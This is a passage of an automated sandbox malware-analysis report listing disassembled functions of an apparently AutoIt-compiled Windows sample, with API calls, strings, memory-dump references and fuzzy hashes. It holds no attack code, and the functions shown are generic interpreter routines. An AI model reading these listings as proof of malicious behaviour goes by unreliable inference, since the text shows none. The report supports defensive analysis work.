                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0083EC6F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                            • String ID:
                                            • API String ID: 3869813825-0
                                            • Opcode ID: 5d12e0c103d73a039365ad21f72481d4f4698808b1d92253fb229c532fd46b93
                                            • Instruction ID: eda0b29745b97ee9b1721dfcd07cc2ab02a81791b59722ff8383c6fac98ebec0
                                            • Opcode Fuzzy Hash: 5d12e0c103d73a039365ad21f72481d4f4698808b1d92253fb229c532fd46b93
                                            • Instruction Fuzzy Hash: B6514A71900709AFDB21EFA8CD89E6EBBF5FF44714F004928E686E25E0D774A944CB50
                                            Function 008579B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 008579C6
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008579D1
                                            • LoadCursorW.USER32(00000000,00007F03), ref: 008579DC
                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 008579E7
                                            • LoadCursorW.USER32(00000000,00007F01), ref: 008579F2
                                            • LoadCursorW.USER32(00000000,00007F81), ref: 008579FD
                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00857A08
                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00857A13
                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00857A1E
                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00857A29
                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00857A34
                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00857A3F
                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00857A4A
                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00857A55
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00857A60
                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00857A6B
                                            • GetCursorInfo.USER32(?), ref: 00857A7B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Cursor$Load$Info
                                            • String ID:
                                            • API String ID: 2577412497-0
                                            • Opcode ID: c62195fa681f4e06a7890bb022dec41dc001bd66450b5dee538a0baeb4058d08
                                            • Instruction ID: 758d5e7ee7c233e04051de39659d637e80e829363a5185f72f10f53b3cb8940e
                                            • Opcode Fuzzy Hash: c62195fa681f4e06a7890bb022dec41dc001bd66450b5dee538a0baeb4058d08
                                            • Instruction Fuzzy Hash: 2E3127B0D0831A6ADB119FB69C8999FBFE8FF04750F50452AE50DE7280DA78A5048FA1
                                            Function 0080C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0080C8B7,?,00002000,?,?,00000000,?,0080419E,?,?,?,0089DC00), ref: 0081E984
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                            • __wsplitpath.LIBCMT ref: 0080C93E
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscpy.LIBCMT ref: 0080C953
                                            • _wcscat.LIBCMT ref: 0080C968
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0080C978
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0080CABE
                                              • Part of subcall function 0080B337: _wcscpy.LIBCMT ref: 0080B36F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                            • API String ID: 2258743419-1018226102
                                            • Opcode ID: a8888213356c8803a27733036ef1027d6dc35c5838666eb365a47a4c4fb2660b
                                            • Instruction ID: ea79edc34e2b1ef91b0544c511f384ad12fc0c1e7a4b758cca96595c70a582d3
                                            • Opcode Fuzzy Hash: a8888213356c8803a27733036ef1027d6dc35c5838666eb365a47a4c4fb2660b
                                            • Instruction Fuzzy Hash: F81256715083459BC764EF28C891AAEBBE4FF98314F40491EF589D32A2DB30DA49DB53
                                            Function 0086CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0086CEFB
                                            • DestroyWindow.USER32(?,?), ref: 0086CF73
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0086CFF4
                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0086D016
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086D025
                                            • DestroyWindow.USER32(?), ref: 0086D042
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0086D075
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086D094
                                            • GetDesktopWindow.USER32 ref: 0086D0A9
                                            • GetWindowRect.USER32(00000000), ref: 0086D0B0
                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0086D0C2
                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0086D0DA
                                              • Part of subcall function 0081B526: GetWindowLongW.USER32(?,000000EB), ref: 0081B537
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                            • String ID: 0$tooltips_class32
                                            • API String ID: 3877571568-3619404913
                                            • Opcode ID: f19c084dbe82e65df0ae02771765ab42f4acf7622c03544aa4ddf17b18d574d5
                                            • Instruction ID: c1e228a0a67e39744e83d16a2cb0e601549e07066bdb6fb2c81c454915db4d29
                                            • Opcode Fuzzy Hash: f19c084dbe82e65df0ae02771765ab42f4acf7622c03544aa4ddf17b18d574d5
                                            • Instruction Fuzzy Hash: 477199B0640305AFEB20CF28DC85FA67BE5FB89708F094519F985C72A1D770E942CB62
                                            Function 0086F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DragQueryPoint.SHELL32(?,?), ref: 0086F37A
                                              • Part of subcall function 0086D7DE: ClientToScreen.USER32(?,?), ref: 0086D807
                                              • Part of subcall function 0086D7DE: GetWindowRect.USER32(?,?), ref: 0086D87D
                                              • Part of subcall function 0086D7DE: PtInRect.USER32(?,?,0086ED5A), ref: 0086D88D
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086F3E3
                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0086F3EE
                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0086F411
                                            • _wcscat.LIBCMT ref: 0086F441
                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0086F458
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086F471
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0086F488
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0086F4AA
                                            • DragFinish.SHELL32(?), ref: 0086F4B1
                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0086F59C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                            • API String ID: 169749273-3440237614
                                            • Opcode ID: d4d2b0e0e64b65aed230f4ef2b62adab46f55a08fc9776c3d1e90febce3f33dd
                                            • Instruction ID: f56fe1218fde0bbeeb5680b22d5f0b828b3641df989a10f643fb4cd5c9a7b371
                                            • Opcode Fuzzy Hash: d4d2b0e0e64b65aed230f4ef2b62adab46f55a08fc9776c3d1e90febce3f33dd
                                            • Instruction Fuzzy Hash: 56613B71108304AFC701EF68DC85D9BBBF8FF99714F000A1EB695962A2DB719A09CB52
                                            Function 0084AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(00000000), ref: 0084AB3D
                                            • VariantCopy.OLEAUT32(?,?), ref: 0084AB46
                                            • VariantClear.OLEAUT32(?), ref: 0084AB52
                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0084AC40
                                            • __swprintf.LIBCMT ref: 0084AC70
                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0084AC9C
                                            • VariantInit.OLEAUT32(?), ref: 0084AD4D
                                            • SysFreeString.OLEAUT32(00000016), ref: 0084ADDF
                                            • VariantClear.OLEAUT32(?), ref: 0084AE35
                                            • VariantClear.OLEAUT32(?), ref: 0084AE44
                                            • VariantInit.OLEAUT32(00000000), ref: 0084AE80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                            • API String ID: 3730832054-3931177956
                                            • Opcode ID: 5ae294fa305cbc56bbb165484983e15f292ab917e4dfd948d4ff4d43e4f3062d
                                            • Instruction ID: 114459109e534c54c92ac85e627184c63e13b0dddf4337035211887033300181
                                            • Opcode Fuzzy Hash: 5ae294fa305cbc56bbb165484983e15f292ab917e4dfd948d4ff4d43e4f3062d
                                            • Instruction Fuzzy Hash: 5DD1EB71A4021DEBDB289F69C884BAEB7B9FF04720F148455E415DF281DB34E880DBA3
                                            Function 0086716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 008671FC
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00867247
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                            • API String ID: 3974292440-4258414348
                                            • Opcode ID: 8e35d2696cd5872a180e9111ae23f445947d5d1edb02c5618b12b1bc04dd34f1
                                            • Instruction ID: 3a1f5072ae32e1145109786dca02c8caf62dae1f5668ba6dcda49aee88f8fa96
                                            • Opcode Fuzzy Hash: 8e35d2696cd5872a180e9111ae23f445947d5d1edb02c5618b12b1bc04dd34f1
                                            • Instruction Fuzzy Hash: 7B9141702046059BCB04EF18C951AAEB7A5FF94314F015859F996EB3A3DB30ED4ACBC2
                                            Function 0086E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0086E5AB
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0086BEAF), ref: 0086E607
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E647
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E68C
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0086E6C3
                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0086BEAF), ref: 0086E6CF
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0086E6DF
                                            • DestroyIcon.USER32(?,?,?,?,?,0086BEAF), ref: 0086E6EE
                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0086E70B
                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0086E717
                                              • Part of subcall function 00820FA7: __wcsicmp_l.LIBCMT ref: 00821030
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                            • String ID: .dll$.exe$.icl
                                            • API String ID: 1212759294-1154884017
                                            • Opcode ID: 3ea5ee31ea5b5246c16fc8162d5de2a46b184d91b05aa3c0b3909c17f447882d
                                            • Instruction ID: b823bc95f6f8cf0e073b3620aafb181e86e6d69a69ee945e0738d06f685a4167
                                            • Opcode Fuzzy Hash: 3ea5ee31ea5b5246c16fc8162d5de2a46b184d91b05aa3c0b3909c17f447882d
                                            • Instruction Fuzzy Hash: 74619EB1540319BAEB24DF68DC46FBE7BA8FB18724F104115F915EA1D1EB74A980CBA0
                                            Function 0084D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CharLowerBuffW.USER32(?,?), ref: 0084D292
                                            • GetDriveTypeW.KERNEL32 ref: 0084D2DF
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D327
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D35E
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0084D38C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                            • API String ID: 1148790751-4113822522
                                            • Opcode ID: 2575f9b7bdf05f08e4ed45a39bfdedad71478bf7f42e1ff159817d2cb2f16c39
                                            • Instruction ID: 52ac53292813c45598bea1c65c5bb543e653deda1f6199d38a1f3781303242f2
                                            • Opcode Fuzzy Hash: 2575f9b7bdf05f08e4ed45a39bfdedad71478bf7f42e1ff159817d2cb2f16c39
                                            • Instruction Fuzzy Hash: 01512B711047059FC740EF14C8919AAB7E8FF98758F10495DF899A73A1DB31EE05CB92
                                            Function 008426BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00873973,00000016,0000138C,00000016,?,00000016,0089DDB4,00000000,?), ref: 008426F1
                                            • LoadStringW.USER32(00000000,?,00873973,00000016), ref: 008426FA
                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00873973,00000016,0000138C,00000016,?,00000016,0089DDB4,00000000,?,00000016), ref: 0084271C
                                            • LoadStringW.USER32(00000000,?,00873973,00000016), ref: 0084271F
                                            • __swprintf.LIBCMT ref: 0084276F
                                            • __swprintf.LIBCMT ref: 00842780
                                            • _wprintf.LIBCMT ref: 00842829
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00842840
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                            • API String ID: 618562835-2268648507
                                            • Opcode ID: 209fa8662fed6395b977def35b896de96a7ae29a81e74e559dacaf6d8ac64183
                                            • Instruction ID: 77b818dfbbdf9b4f04643adbd819441a5e88b9e64d4744cc4c0e76e6fbfae586
                                            • Opcode Fuzzy Hash: 209fa8662fed6395b977def35b896de96a7ae29a81e74e559dacaf6d8ac64183
                                            • Instruction Fuzzy Hash: CD411B72800218AACB54FBE8DD96DEEB778FF18340F500165B501F21D2EA646F59CBA2
                                            Function 0084D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0084D0D8
                                            • __swprintf.LIBCMT ref: 0084D0FA
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0084D137
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0084D15C
                                            • _memset.LIBCMT ref: 0084D17B
                                            • _wcsncpy.LIBCMT ref: 0084D1B7
                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0084D1EC
                                            • CloseHandle.KERNEL32(00000000), ref: 0084D1F7
                                            • RemoveDirectoryW.KERNEL32(?), ref: 0084D200
                                            • CloseHandle.KERNEL32(00000000), ref: 0084D20A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                            • String ID: :$\$\??\%s
                                            • API String ID: 2733774712-3457252023
                                            • Opcode ID: 938cddc144a791e6a8d34adfe009a9fea7ca844b8f57b75e4cebb1e8a8341fc1
                                            • Instruction ID: b8cb73f0e9f9e4627f02f3546c417c836daed73033e76d3ad99bab9536723153
                                            • Opcode Fuzzy Hash: 938cddc144a791e6a8d34adfe009a9fea7ca844b8f57b75e4cebb1e8a8341fc1
                                            • Instruction Fuzzy Hash: 5E3183B2500219ABDB21DFA4DC49FEB77BCFF89740F1040B6F909D21A1E770A6458B25
                                            Function 0086E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0086BEF4,?,?), ref: 0086E754
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E76B
                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E776
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E783
                                            • GlobalLock.KERNEL32(00000000), ref: 0086E78C
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E79B
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0086E7A4
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E7AB
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0086BEF4,?,?,00000000,?), ref: 0086E7BC
                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0088D9BC,?), ref: 0086E7D5
                                            • GlobalFree.KERNEL32(00000000), ref: 0086E7E5
                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0086E809
                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0086E834
                                            • DeleteObject.GDI32(00000000), ref: 0086E85C
                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0086E872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                            • String ID:
                                            • API String ID: 3840717409-0
                                            • Opcode ID: 6855718be950daee3f259ade430583105516e56464309a62d9a364c83f1112e8
                                            • Instruction ID: 64e58998a926e696d36ff77ec615c476d447c41fef45819e057007130a2d3c90
                                            • Opcode Fuzzy Hash: 6855718be950daee3f259ade430583105516e56464309a62d9a364c83f1112e8
                                            • Instruction Fuzzy Hash: 76413A75600308EFDB119F69DC88EAA7BB9FF89725F104068F905D72A0D770AD41DB60
                                            Function 008505F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                            Download Yara Rule
                                            APIs
                                            • __wsplitpath.LIBCMT ref: 0085076F
                                            • _wcscat.LIBCMT ref: 00850787
                                            • _wcscat.LIBCMT ref: 00850799
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008507AE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008507C2
                                            • GetFileAttributesW.KERNEL32(?), ref: 008507DA
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 008507F4
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850806
                                            Strings
                                            Memory Dump Source
